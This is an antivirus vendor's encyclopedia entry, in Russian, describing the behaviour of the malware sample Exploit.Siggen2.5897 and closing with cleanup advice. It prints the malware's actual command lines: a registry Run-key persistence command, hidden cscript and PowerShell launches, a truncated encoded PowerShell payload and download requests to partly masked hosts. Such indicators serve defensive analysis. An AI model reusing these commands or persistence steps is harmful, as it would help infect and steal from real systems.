Для корректной работы нашего сайта необходимо включить поддержку JavaScript в вашем браузере.
Exploit.Siggen2.5897
Добавлен в вирусную базу Dr.Web:
2020-06-26
Описание добавлено:
2020-06-28
Техническая информация
Для обеспечения автозапуска и распространения
Модифицирует следующие ключи реестра
[<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] '' = '%APPDATA%\Microsoft\SystemCertificates\My\Certificates\soma.vbs'
Вредоносные функции
Создает и запускает на исполнение (эксплоит)
'%WINDIR%\syswow64\cscript.exe' %TEMP%\soma.vbs AC
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-Item -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Value '%APPDATA%\Microsoft\SystemCertificates\My\Certificates\soma.vbs'
Запускает на исполнение (эксплоит)
'%WINDIR%\syswow64\cmd.exe' /C cscript %tmp%\soma.vbs AC
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $37BE7CD97CBF2952A2A0E7BBD79294351D9451BE42850F277886BCA1CD88=@(100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,1...
Внедряет код в
следующие системные процессы:
%WINDIR%\syswow64\calc.exe
%WINDIR%\explorer.exe
%WINDIR%\syswow64\systray.exe
следующие пользовательские процессы:
Перехватывает функции
в браузерах
Процесс firefox.exe, модуль nss3.dll
Изменения в файловой системе
Создает следующие файлы
%TEMP%\soma.vbs
%APPDATA%\microsoft\systemcertificates\my\certificates\soma.vbs
%APPDATA%\microsoft\crypto\rsa\s-1-5-21-1960123792-2022915161-3775307078-1001\ffbc9ff291795647a5236ac884aa68b0_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
%APPDATA%\microsoft\crypto\rsa\s-1-5-21-1960123792-2022915161-3775307078-1001\98ffc3d762c64a3b5de1605bb6b195fb_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
%APPDATA%\microsoft\crypto\rsa\s-1-5-21-1960123792-2022915161-3775307078-1001\b9f6d148dd66fb0474189bd6894320e8_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
%APPDATA%\microsoft\crypto\rsa\s-1-5-21-1960123792-2022915161-3775307078-1001\45d2b3939da02f0624d644577e914595_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
%APPDATA%\microsoft\crypto\rsa\s-1-5-21-1960123792-2022915161-3775307078-1001\519575f147accd18905db130cc4cbf17_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
%APPDATA%\microsoft\crypto\rsa\s-1-5-21-1960123792-2022915161-3775307078-1001\7eef3069a8a6df9e618aa04d2117d731_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
%APPDATA%\microsoft\crypto\rsa\s-1-5-21-1960123792-2022915161-3775307078-1001\b82d71a7ef50bba37f6b3f5cb1249657_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
%APPDATA%\microsoft\crypto\rsa\s-1-5-21-1960123792-2022915161-3775307078-1001\8163121a97acfda107cd26dc2241676b_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
%APPDATA%\microsoft\crypto\rsa\s-1-5-21-1960123792-2022915161-3775307078-1001\4de7e343c5204ed309e6fd6befa64084_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
%APPDATA%\microsoft\crypto\rsa\s-1-5-21-1960123792-2022915161-3775307078-1001\d7e9a787f80ec072582f17434be84fc1_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
%APPDATA%\microsoft\crypto\rsa\s-1-5-21-1960123792-2022915161-3775307078-1001\e03a591f412babd60d126e3382729492_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
%APPDATA%\microsoft\crypto\rsa\s-1-5-21-1960123792-2022915161-3775307078-1001\3e32435028fddae1500d46890c6f874b_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
%APPDATA%\microsoft\crypto\rsa\s-1-5-21-1960123792-2022915161-3775307078-1001\7e3019380436db1bfabf07a221ee02ca_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
%APPDATA%\microsoft\crypto\rsa\s-1-5-21-1960123792-2022915161-3775307078-1001\eee43ea4288faabde563ba1f0d1ddb4d_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
Удаляет следующие файлы
%APPDATA%\microsoft\crypto\rsa\s-1-5-21-1960123792-2022915161-3775307078-1001\ffbc9ff291795647a5236ac884aa68b0_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
%APPDATA%\microsoft\crypto\rsa\s-1-5-21-1960123792-2022915161-3775307078-1001\98ffc3d762c64a3b5de1605bb6b195fb_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
%APPDATA%\microsoft\crypto\rsa\s-1-5-21-1960123792-2022915161-3775307078-1001\b9f6d148dd66fb0474189bd6894320e8_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
%APPDATA%\microsoft\crypto\rsa\s-1-5-21-1960123792-2022915161-3775307078-1001\45d2b3939da02f0624d644577e914595_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
%APPDATA%\microsoft\crypto\rsa\s-1-5-21-1960123792-2022915161-3775307078-1001\519575f147accd18905db130cc4cbf17_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
%APPDATA%\microsoft\crypto\rsa\s-1-5-21-1960123792-2022915161-3775307078-1001\7eef3069a8a6df9e618aa04d2117d731_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
%APPDATA%\microsoft\crypto\rsa\s-1-5-21-1960123792-2022915161-3775307078-1001\b82d71a7ef50bba37f6b3f5cb1249657_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
%APPDATA%\microsoft\crypto\rsa\s-1-5-21-1960123792-2022915161-3775307078-1001\8163121a97acfda107cd26dc2241676b_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
%APPDATA%\microsoft\crypto\rsa\s-1-5-21-1960123792-2022915161-3775307078-1001\4de7e343c5204ed309e6fd6befa64084_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
%APPDATA%\microsoft\crypto\rsa\s-1-5-21-1960123792-2022915161-3775307078-1001\d7e9a787f80ec072582f17434be84fc1_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
%APPDATA%\microsoft\crypto\rsa\s-1-5-21-1960123792-2022915161-3775307078-1001\e03a591f412babd60d126e3382729492_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
%APPDATA%\microsoft\crypto\rsa\s-1-5-21-1960123792-2022915161-3775307078-1001\3e32435028fddae1500d46890c6f874b_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
%APPDATA%\microsoft\crypto\rsa\s-1-5-21-1960123792-2022915161-3775307078-1001\7e3019380436db1bfabf07a221ee02ca_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
%APPDATA%\microsoft\crypto\rsa\s-1-5-21-1960123792-2022915161-3775307078-1001\eee43ea4288faabde563ba1f0d1ddb4d_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
Сетевая активность
TCP
Запросы HTTP GET
http://www.as####kasounds.com/upfiles/up_down/d167b3a3f9d124596d50655ec0c51a34.mp3
http://www.as####kasounds.com/upfiles/up_down/83dcf1a7bff876e5ad706d2eb25c3e94.mp3
UDP
DNS ASK as####kasounds.com
DNS ASK sh###flairs.com
Другое
Создает и запускает на исполнение
'%WINDIR%\syswow64\cmd.exe' /C cscript %tmp%\soma.vbs AC' (со скрытым окном)
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $37BE7CD97CBF2952A2A0E7BBD79294351D9451BE42850F277886BCA1CD88=@(100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,1...' (со скрытым окном)
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-Item -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Value '%APPDATA%\Microsoft\SystemCertificates\My\Certificates\soma.vbs'' (со скрытым окном)
'<SYSTEM32>\cmd.exe' /C CopY "%TEMP%\soma.vbs" "%APPDATA%\Microsoft\SystemCertificates\My\Certificates" /Y' (со скрытым окном)
Запускает на исполнение
'%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
'%WINDIR%\syswow64\cmd.exe' /c sc query wcncsvc >> AC
'<SYSTEM32>\cmd.exe' /C CopY "%TEMP%\soma.vbs" "%APPDATA%\Microsoft\SystemCertificates\My\Certificates" /Y
'%WINDIR%\syswow64\calc.exe'
'%WINDIR%\syswow64\systray.exe'
'%WINDIR%\syswow64\cmd.exe' del "%WINDIR%\syswow64\calc.exe"
'%ProgramFiles(x86)%\mozilla firefox\firefox.exe'
Рекомендации по лечению
Windows
macOS
Linux
Android
В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store .
Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light . Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
выключите устройство и включите его в обычном режиме.
Подробнее о Dr.Web для Android
Демо бесплатно на 14 дней
Выдаётся при установке
Поздравляем!
Обменяйте их на скидку до 50% на покупку Dr.Web.
Получить скидку
Скачайте Dr.Web для Android
Бесплатно на 3 месяца
Все компоненты защиты
Продление демо через AppGallery/Google Pay
Если Вы продолжите использование данного сайта, это означает, что Вы даете согласие на использование нами Cookie-файлов и иных технологий по сбору статистических сведений о посетителях. Подробнее
OK